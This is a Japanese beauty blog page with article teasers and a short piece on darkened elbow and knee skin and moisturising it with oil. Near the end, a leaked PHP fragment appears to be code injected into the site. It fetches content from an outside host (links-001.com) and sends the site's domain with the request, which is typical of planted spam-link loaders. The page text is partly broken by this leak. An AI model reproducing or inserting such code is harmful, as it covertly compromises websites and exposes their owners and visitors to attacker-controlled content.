前へ
次へ

美容整形外科クリニックを活用する方法は

昔よりも、たくさんのところで美容整形外科クリニックが見かけられるようになりました。うまく活用すること

more

手の紫外線対策も意外に侮れない

シワは美容の大敵ですが、その原因の多くは太陽光といった紫外線です。そのため外出する時はUVケアをしっ

more

肩甲骨はがしで肩こりと猫背を解消

肩こりがひどい人は肩甲骨を支える筋肉がゆるみ位置がずれている、と聞いて肩甲骨はがしを試しています。肩

more

汗腺がなく皮膚の乾きやすいひじやひざの黒ずみ

気が付くとひじやひざには黒ずみが生じやすいですが、皮膚がすごく薄くて骨に近く、衣類で擦れたり刺激も加わる場所だからです。美白ブームが続いている中で、顔や手などは白く保つことができても、ひじやひざに黒ずみがあると、白い肌の中で余計に目立ちます。一度生じた黒ずみは消しゴミで消すように、すぐに白くすることはできません。ですが人間の皮膚は健康な状態であれば、順調な皮膚細胞の生まれ変わりを、およそ28日のサイクルで行います。正しいスキンケアを継続していくことで、ある程度の時間をかけながら、ひじやひざの黒ずみを本来の明るい肌の色に変えていくことは可能です。他の部位とは異なり汗腺がないのもひじやひざであり、通常よりも皮膚の乾きは激しく、潤い不足なうえに降り角質も溜まりやすいパーツでもあります。でも簡単なお手入れとして、お風呂上りにひじやひざに、美容オイルを塗るだけで明るい色の皮膚状態を目指すことは可能です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top